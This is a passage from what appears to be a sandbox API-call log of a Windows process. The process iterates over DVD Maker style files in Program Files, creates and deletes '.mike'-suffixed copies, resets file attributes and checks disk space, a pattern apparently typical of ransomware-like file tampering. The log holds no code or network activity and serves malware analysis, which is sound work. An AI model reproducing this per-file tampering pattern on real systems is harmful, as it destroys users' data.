Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png", lpFilePart=0x0) returned 0x4d [0054.938] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.938] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.938] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png", dwFileAttributes=0x80) returned 0 [0054.938] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.939] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.939] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_buttongraphic.png.mike")) returned 1 [0054.941] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.941] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x58 [0054.942] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png", lpFilePart=0x0) returned 0x53 [0054.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x58 [0054.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x58 [0054.945] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png", dwFileAttributes=0x80) returned 0 [0054.946] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x58 [0054.946] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x58 [0054.946] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_selectionsubpicture.png.mike")) returned 1 [0054.948] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.948] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png.mike", lpFilePart=0x0) returned 0x4f [0054.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png", lpFilePart=0x0) returned 0x4a [0054.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png.mike", lpFilePart=0x0) returned 0x4f [0054.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png.mike", lpFilePart=0x0) returned 0x4f [0054.952] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png", dwFileAttributes=0x80) returned 0 [0054.953] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png.mike", lpFilePart=0x0) returned 0x4f [0054.953] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png.mike", lpFilePart=0x0) returned 0x4f [0054.953] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_videoinset.png.mike")) returned 1 [0054.955] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.955] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png.mike", lpFilePart=0x0) returned 0x3d [0054.956] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png", lpFilePart=0x0) returned 0x38 [0054.961] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png.mike", lpFilePart=0x0) returned 0x3d [0054.961] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png.mike", lpFilePart=0x0) returned 0x3d [0054.961] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png", dwFileAttributes=0x80) returned 0 [0054.962] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png.mike", lpFilePart=0x0) returned 0x3d [0054.962] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png.mike", lpFilePart=0x0) returned 0x3d [0054.962] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\whitedot.png.mike")) returned 1 [0054.964] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0054.964] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0054.964] CoTaskMemFree (pv=0x4e1c10) [0054.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0054.964] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", lpFilePart=0x0) returned 0x33 [0054.973] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.974] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png.mike", lpFilePart=0x0) returned 0x45 [0054.974] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png", lpFilePart=0x0) returned 0x40 [0054.979] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png.mike", lpFilePart=0x0) returned 0x45 [0054.979] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png", dwFileAttributes=0x80) returned 0 [0054.980] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png.mike", lpFilePart=0x0) returned 0x45 [0054.980] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png.mike", lpFilePart=0x0) returned 0x45 [0054.980] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyblue.png.mike")) returned 1 [0054.982] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0054.982] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.mike", lpFilePart=0x0) returned 0x52 [0055.020] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.mike", lpFilePart=0x0) returned 0x52 [0055.020] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.mike", lpFilePart=0x0) returned 0x52 [0055.020] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv", dwFileAttributes=0x80) returned 0 [0055.021] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.mike", lpFilePart=0x0) returned 0x52 [0055.021] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.mike", lpFilePart=0x0) returned 0x52 [0055.021] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv.mike")) returned 1 [0055.024] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.024] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x56 [0055.058] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x56 [0055.058] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x56 [0055.058] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0055.059] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x56 [0055.059] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x56 [0055.059] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv.mike")) returned 1 [0055.062] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.062] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.mike", lpFilePart=0x0) returned 0x59 [0055.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.mike", lpFilePart=0x0) returned 0x59 [0055.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.mike", lpFilePart=0x0) returned 0x59 [0055.078] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv", dwFileAttributes=0x80) returned 0 [0055.079] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.mike", lpFilePart=0x0) returned 0x59 [0055.079] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.mike", lpFilePart=0x0) returned 0x59 [0055.079] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground.wmv.mike")) returned 1 [0055.081] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x5d [0055.106] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x5d [0055.106] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x5d [0055.106] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0055.107] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x5d [0055.107] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x5d [0055.107] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground_pal.wmv.mike")) returned 1 [0055.110] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.110] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.mike", lpFilePart=0x0) returned 0x5a [0055.120] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.mike", lpFilePart=0x0) returned 0x5a [0055.120] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.mike", lpFilePart=0x0) returned 0x5a [0055.120] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv", dwFileAttributes=0x80) returned 0 [0055.121] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.mike", lpFilePart=0x0) returned 0x5a [0055.121] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.mike", lpFilePart=0x0) returned 0x5a [0055.121] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground.wmv.mike")) returned 1 [0055.123] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.123] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD 